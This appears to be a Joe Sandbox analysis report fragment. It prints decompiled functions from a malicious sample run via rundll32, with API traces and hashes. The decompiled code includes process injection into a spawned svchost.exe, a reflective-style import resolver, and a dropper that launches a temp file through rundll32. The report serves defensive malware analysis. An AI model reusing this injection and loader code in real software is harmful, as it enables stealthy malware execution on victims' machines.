                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 0f738a6f7c31cbabb9cbd4129a45be7a32f1694c722a73322d9c812d93289042
                                                  • Instruction ID: c81aaa15bbae847f41e10ea771c7c2229398db9f520c9a546ec328fb2d1ec804
                                                  • Opcode Fuzzy Hash: 0f738a6f7c31cbabb9cbd4129a45be7a32f1694c722a73322d9c812d93289042
                                                  • Instruction Fuzzy Hash: DDC0123A104B48ABD22A9F85EC48BAA33EDA306341F004014B6084E7A0CBB5B898CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00343880, Relevance: 10.6, APIs: 7, Instructions: 103memorythreadinjectionCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E00343880(void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				long _v36;

				if(_a12 == 0) {
					_v8 = VirtualAlloc(0, _a8, 0x3000, 0x40);
					if(_v8 == 0) {
						L14:
						return 0;
					}
					E00341450(_v8, _a4, _a8);
					if(_a16 == 0) {
						_v28 = _v8;
						_v28();
						return 1;
					}
					_v24 = CreateThread(0, 0, E003439E0, _v8, 0, 0);
					if(_v24 == 0) {
						goto L14;
					}
					CloseHandle(_v24);
					return 1;
				}
				if(E00342C40( &_v16,  &_v32) != 0) {
					_v12 = VirtualAllocEx(_v16, 0, _a8, 0x3000, 0x40);
					if(_v12 == 0 || WriteProcessMemory(_v16, _v12, _a4, _a8, 0) == 0) {
						L7:
						goto L14;
					} else {
						_v20 = CreateRemoteThread(_v16, 0, 0, _v12, 0, 0,  &_v36);
						if(_v20 == 0) {
							goto L7;
						}
						CloseHandle(_v20);
						return 1;
					}
				}
				return 0;
			}











                                                  0x0034388a
                                                  0x00343930
                                                  0x00343937
                                                  0x00343996
                                                  0x00000000
                                                  0x00343996
                                                  0x00343945
                                                  0x00343951
                                                  0x00343989
                                                  0x0034398c
                                                  0x00000000
                                                  0x0034398f
                                                  0x0034396a
                                                  0x00343971
                                                  0x00000000
                                                  0x00343984
                                                  0x00343977
                                                  0x00000000
                                                  0x0034397d
                                                  0x003438a2
                                                  0x003438c2
                                                  0x003438c9
                                                  0x0034391b
                                                  0x00000000
                                                  0x003438e7
                                                  0x00343901
                                                  0x00343908
                                                  0x00000000
                                                  0x00000000
                                                  0x0034390e
                                                  0x00000000
                                                  0x00343914
                                                  0x003438c9
                                                  0x00000000

                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(00500000,00000000,00500000,00003000,00000040,?,?,?,?,?,00341FB7), ref: 003438BC
                                                  • WriteProcessMemory.KERNEL32(00500000,00000000,00000000,00500000,00000000,?,?,?,?,?,00341FB7), ref: 003438DD
                                                  • CreateRemoteThread.KERNEL32(00500000,00000000,00000000,00000000,00000000,00000000,?), ref: 003438FB
                                                  • CloseHandle.KERNEL32(00000000), ref: 0034390E
                                                  • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000040,?,?,?,00341FB7), ref: 0034392A
                                                  • CreateThread.KERNEL32(00000000,00000000,003439E0,00000000,00000000,00000000), ref: 00343964
                                                  • CloseHandle.KERNEL32(00000000), ref: 00343977
                                                    • Part of subcall function 00342C40: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00342C71
                                                    • Part of subcall function 00342C40: lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 00342C83
                                                    • Part of subcall function 00342C40: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 00342CA9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$AllocCloseHandleProcessThreadVirtual$EnvironmentMemoryRemoteVariableWritelstrcat
                                                  • String ID:
                                                  • API String ID: 2742758278-0
                                                  • Opcode ID: 8b02201f2cb4a1aeda9aafd120f8dabe7269c3427950c71fa9c9f01156f0d178
                                                  • Instruction ID: b760d1ef50233d51b48b99b4ceacf8965e5fb647eb573a11055212c1da94c0ca
                                                  • Opcode Fuzzy Hash: 8b02201f2cb4a1aeda9aafd120f8dabe7269c3427950c71fa9c9f01156f0d178
                                                  • Instruction Fuzzy Hash: 16311E79A44208FBEB15DFA4DC49FAEB7B8AB48701F104518F605AF2C0D7B5AB40CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0034B083, Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0034CC47
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0034CC5C
                                                  • UnhandledExceptionFilter.KERNEL32(003593AC), ref: 0034CC67
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0034CC83
                                                  • TerminateProcess.KERNEL32(00000000), ref: 0034CC8A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: ef4e8b3e93a5e6b76ea8b9dc20ca3abec37de38dd6b74ea16005d52e05e4448b
                                                  • Instruction ID: c9958013b3a52880d25e6d9c35b32e6b97af3731df35ad85d5d05776307b165c
                                                  • Opcode Fuzzy Hash: ef4e8b3e93a5e6b76ea8b9dc20ca3abec37de38dd6b74ea16005d52e05e4448b
                                                  • Instruction Fuzzy Hash: 2121BFB8A11304DFC703DF2AED846547BACBB08315F50D41AE80987261EBF069848F5A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00343580, Relevance: 6.1, APIs: 4, Instructions: 105libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00343580(intOrPtr _a4) {
				intOrPtr* _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				signed int* _v20;
				_Unknown_base(*)()* _v24;
				CHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				intOrPtr _v48;

				_v32 = _a4;
				_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
				_v40 = _v36 + 0xbadc25;
				_v44 =  *_v40;
				_v8 = _a4 + _v44;
				while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
					_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
					_v12 = 0;
					_v12 = GetModuleHandleA(_v28);
					if(_v12 == 0) {
						_v12 = LoadLibraryA(_v28);
					}
					if(_v12 != 0) {
						_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
						_v20 = _a4 +  *_v8;
						if( *_v8 == 0) {
							_v20 = _v16;
						}
						while( *_v16 != 0) {
							_v48 = _a4 +  *_v20;
							_v24 = 0;
							if(( *_v20 & 0x80000000) == 0) {
								_v24 = GetProcAddress(_v12, _v48 + 2);
							} else {
								_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
							}
							if( *_v16 != _v24) {
								 *_v16 = _v24;
							}
							_v16 = _v16 + 4;
							_v20 =  &(_v20[1]);
						}
						_v8 = _v8 + 0x14;
						continue;
					} else {
						return 0;
					}
				}
				return 1;
			}














                                                  0x00343589
                                                  0x00343595
                                                  0x003435a7
                                                  0x003435af
                                                  0x003435b8
                                                  0x003435bb
                                                  0x003435d1
                                                  0x003435d4
                                                  0x003435e5
                                                  0x003435ec
                                                  0x003435f8
                                                  0x003435f8
                                                  0x003435ff
                                                  0x00343611
                                                  0x0034361c
                                                  0x00343625
                                                  0x0034362a
                                                  0x0034362a
                                                  0x0034362d
                                                  0x0034363d
                                                  0x00343640
                                                  0x00343651
                                                  0x0034367f
                                                  0x00343653
                                                  0x00343669
                                                  0x00343669
                                                  0x0034368a
                                                  0x00343692
                                                  0x00343692
                                                  0x0034369a
                                                  0x003436a3
                                                  0x003436a3
                                                  0x003436ae
                                                  0x00000000
                                                  0x00343601
                                                  0x00000000
                                                  0x00343601
                                                  0x003435ff
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?), ref: 003435DF
                                                  • LoadLibraryA.KERNEL32(?), ref: 003435F2
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00343663
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00343679
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                  • String ID:
                                                  • API String ID: 384173800-0
                                                  • Opcode ID: 309d741347cd8536c3b859be301394d8e31844ac3f8805327c234dcc6dd952e4
                                                  • Instruction ID: 089d8c1d185ff386aa56c9832ee8947ac2c053ec088971c44c118d4504fe4fc5
                                                  • Opcode Fuzzy Hash: 309d741347cd8536c3b859be301394d8e31844ac3f8805327c234dcc6dd952e4
                                                  • Instruction Fuzzy Hash: 8241A674E00209EFDB05CF98C594BADBBB5FF48304F218599D915AB354D734AA41CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342D17, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00342D17() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                                  0x00342da4
                                                  0x00342daa
                                                  0x00342db0
                                                  0x00342db0
                                                  0x00342dbb
                                                  0x00342dc1
                                                  0x00342dc7
                                                  0x00342dc7
                                                  0x00342dd2
                                                  0x00342dda
                                                  0x00342de0
                                                  0x00342de0
                                                  0x00342ded

                                                  APIs
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Destroy$ContextHashRelease
                                                  • String ID:
                                                  • API String ID: 3577760690-0
                                                  • Opcode ID: 64028113b29cd324a4c0f9119a74aea3742cb22dfbe62ccea184960067200f22
                                                  • Instruction ID: 2b58769ee976deceda4b49febfafa49f3802f82a6efa2c637fd61bc6ba77f7ba
                                                  • Opcode Fuzzy Hash: 64028113b29cd324a4c0f9119a74aea3742cb22dfbe62ccea184960067200f22
                                                  • Instruction Fuzzy Hash: 62F01C78D00208EBDF22CF94D84CBAEBBB4EB05305F508098F5117A390C7796A44DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342D98, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00342D98() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                                  0x00342da4
                                                  0x00342daa
                                                  0x00342db0
                                                  0x00342db0
                                                  0x00342dbb
                                                  0x00342dc1
                                                  0x00342dc7
                                                  0x00342dc7
                                                  0x00342dd2
                                                  0x00342dda
                                                  0x00342de0
                                                  0x00342de0
                                                  0x00342ded

                                                  APIs
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Destroy$ContextHashRelease
                                                  • String ID:
                                                  • API String ID: 3577760690-0
                                                  • Opcode ID: b95e167d2763c6dc185f490256ca1faf6cd1fe1659b628589e0af0351b352042
                                                  • Instruction ID: 2b58769ee976deceda4b49febfafa49f3802f82a6efa2c637fd61bc6ba77f7ba
                                                  • Opcode Fuzzy Hash: b95e167d2763c6dc185f490256ca1faf6cd1fe1659b628589e0af0351b352042
                                                  • Instruction Fuzzy Hash: 62F01C78D00208EBDF22CF94D84CBAEBBB4EB05305F508098F5117A390C7796A44DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342D78, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00342D78() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                                  0x00342da4
                                                  0x00342daa
                                                  0x00342db0
                                                  0x00342db0
                                                  0x00342dbb
                                                  0x00342dc1
                                                  0x00342dc7
                                                  0x00342dc7
                                                  0x00342dd2
                                                  0x00342dda
                                                  0x00342de0
                                                  0x00342de0
                                                  0x00342ded

                                                  APIs
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Destroy$ContextHashRelease
                                                  • String ID:
                                                  • API String ID: 3577760690-0
                                                  • Opcode ID: 812e30b5683bf31b9674e91e2017c073e0de185cddec408f0a37af6f5817e099
                                                  • Instruction ID: 2b58769ee976deceda4b49febfafa49f3802f82a6efa2c637fd61bc6ba77f7ba
                                                  • Opcode Fuzzy Hash: 812e30b5683bf31b9674e91e2017c073e0de185cddec408f0a37af6f5817e099
                                                  • Instruction Fuzzy Hash: 62F01C78D00208EBDF22CF94D84CBAEBBB4EB05305F508098F5117A390C7796A44DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342D55, Relevance: 4.5, APIs: 3, Instructions: 24encryptionCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00342D55() {
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				return  *((intOrPtr*)(_t17 - 0x10));
			}




                                                  0x00342da4
                                                  0x00342daa
                                                  0x00342db0
                                                  0x00342db0
                                                  0x00342dbb
                                                  0x00342dc1
                                                  0x00342dc7
                                                  0x00342dc7
                                                  0x00342dd2
                                                  0x00342dda
                                                  0x00342de0
                                                  0x00342de0
                                                  0x00342ded

                                                  APIs
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Destroy$ContextHashRelease
                                                  • String ID:
                                                  • API String ID: 3577760690-0
                                                  • Opcode ID: dd36a8368929776a62e2388577fc631267f7545daf511757283aa524fe086b8f
                                                  • Instruction ID: 2b58769ee976deceda4b49febfafa49f3802f82a6efa2c637fd61bc6ba77f7ba
                                                  • Opcode Fuzzy Hash: dd36a8368929776a62e2388577fc631267f7545daf511757283aa524fe086b8f
                                                  • Instruction Fuzzy Hash: 62F01C78D00208EBDF22CF94D84CBAEBBB4EB05305F508098F5117A390C7796A44DF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0035203E, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __decode_pointer.LIBCMT ref: 0035204C
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00352053
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled__decode_pointer
                                                  • String ID:
                                                  • API String ID: 3341406909-0
                                                  • Opcode ID: 10f5fb23b7dc3b145ff4bd90bb2514b4662c4f61d87a2194d3cfc2f4838be236
                                                  • Instruction ID: db12bb5454fc9ba2572ff6d388325f8020aed160210235ef216cb84c5b75f7fa
                                                  • Opcode Fuzzy Hash: 10f5fb23b7dc3b145ff4bd90bb2514b4662c4f61d87a2194d3cfc2f4838be236
                                                  • Instruction Fuzzy Hash: 01C04C5AD183C08ADB035778584D3097E58A755711F54C8AAD4418B1DAD5B550448721
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036E607, Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348607784.000000000036E000.00000040.00020000.sdmp, Offset: 0036E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36e000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                  • Instruction ID: 5edd3c0a585ef12230ed7a51e5f985dc970b42ac7d04810d29abdc78883e6dd0
                                                  • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                  • Instruction Fuzzy Hash: FC1193773401019FD715DE59EC91EA2B3DAFB99330B298066ED08CB709E636EC45C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036EA00, Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348607784.000000000036E000.00000040.00020000.sdmp, Offset: 0036E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36e000_rundll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                  • Instruction ID: 3335f81738259b148cc70259dc3b37ca20f842685e04328b773a6cb53c927733
                                                  • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                                  • Instruction Fuzzy Hash: 9701D67B314240CFDB1ACF98D994D79B7E8FBC1324B1AC07EC44687619E130E949CA20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0034EC3D, Relevance: 19.6, APIs: 13, Instructions: 109memorythreadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(0035943C,?,0034BF21,?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 0034EC43
                                                  • __mtterm.LIBCMT ref: 0034EC4F
                                                    • Part of subcall function 0034E927: __decode_pointer.LIBCMT ref: 0034E938
                                                    • Part of subcall function 0034E927: TlsFree.KERNEL32(0036CB74,0034BFBD,?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 0034E952
                                                  • TlsAlloc.KERNEL32(?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 0034ECDC
                                                  • __init_pointers.LIBCMT ref: 0034ED01
                                                  • __encode_pointer.LIBCMT ref: 0034ED0C
                                                  • __encode_pointer.LIBCMT ref: 0034ED1C
                                                  • __encode_pointer.LIBCMT ref: 0034ED2C
                                                  • __encode_pointer.LIBCMT ref: 0034ED3C
                                                  • __decode_pointer.LIBCMT ref: 0034ED5D
                                                  • __calloc_crt.LIBCMT ref: 0034ED76
                                                  • __decode_pointer.LIBCMT ref: 0034ED90
                                                  • GetCurrentThreadId.KERNEL32(?,?,0036B0A8,0036D2FC), ref: 0034EDA6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__mtterm
                                                  • String ID:
                                                  • API String ID: 802150526-0
                                                  • Opcode ID: 2c620d458e02ec8f2caabef93c83b991a21ace09dcc18aac44f7e878ca7cbcb1
                                                  • Instruction ID: 1a37ac7d69bfdadbb0315593c10cd4e77f15de5ebcc966dc6a41cc0e3c486a28
                                                  • Opcode Fuzzy Hash: 2c620d458e02ec8f2caabef93c83b991a21ace09dcc18aac44f7e878ca7cbcb1
                                                  • Instruction Fuzzy Hash: 19319371E00311DECB13BF75EC0AA567BE8BB05761F85862AE8499E1F0EBF1A400CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0034C707, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • __lock.LIBCMT ref: 0034C725
                                                    • Part of subcall function 00352F42: __mtinitlocknum.LIBCMT ref: 00352F56
                                                    • Part of subcall function 00352F42: __amsg_exit.LIBCMT ref: 00352F62
                                                    • Part of subcall function 00352F42: RtlEnterCriticalSection.NTDLL(FCBE00F1), ref: 00352F6A
                                                  • ___sbh_find_block.LIBCMT ref: 0034C730
                                                  • ___sbh_free_block.LIBCMT ref: 0034C73F
                                                  • HeapFree.KERNEL32(00000000,0034BE12,0036AB38), ref: 0034C76F
                                                  • GetLastError.KERNEL32(?,?,0034D16F,0034D31B,?,0034BE12,?), ref: 0034C780
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 2714421763-0
                                                  • Opcode ID: 1a1a8092bec646c9bfd204203466ea82da0f5837488635d065254ea0ac1bd00f
                                                  • Instruction ID: 8556e8749aac61c6ed4efdcf7043c2161d8d897620f00d12494a3a1a1d32b761
                                                  • Opcode Fuzzy Hash: 1a1a8092bec646c9bfd204203466ea82da0f5837488635d065254ea0ac1bd00f
                                                  • Instruction Fuzzy Hash: 91018F31906205AFDB737BB0AC0AB5E7AE4AF01761F109015F900AE1A1CB74A5408EA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00343B30, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E00343B30(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v264;
				char _v524;
				char _v784;

				GetTempPathA(0x104,  &_v524);
				GetTempFileNameA( &_v524, "BN", 0,  &_v264);
				if(E00343AC0(_a4,  &_v264, _a4, _a8) != 1) {
					return 0;
				}
				_push(_a8);
				if(E003433C0(_a4) != 1) {
					return E003436C0( &_v264);
				}
				wsprintfA( &_v784, "Rundll32.exe %s, start",  &_v264);
				return E003436C0( &_v784);
			}






                                                  0x00343b45
                                                  0x00343b60
                                                  0x00343b80
                                                  0x00000000
                                                  0x00343bd7
                                                  0x00343b85
                                                  0x00343b95
                                                  0x00000000
                                                  0x00343bd2
                                                  0x00343baa
                                                  0x00000000

                                                  APIs
                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 00343B45
                                                  • GetTempFileNameA.KERNEL32(?,003442C0,00000000,?), ref: 00343B60
                                                    • Part of subcall function 00343AC0: CreateFileA.KERNEL32(00341691,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00343AE6
                                                    • Part of subcall function 00343AC0: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00343B07
                                                    • Part of subcall function 00343AC0: CloseHandle.KERNEL32(000000FF), ref: 00343B11
                                                  • wsprintfA.USER32 ref: 00343BAA
                                                    • Part of subcall function 003436C0: CreateProcessA.KERNEL32(00000000,00343BD2,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 003436F7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
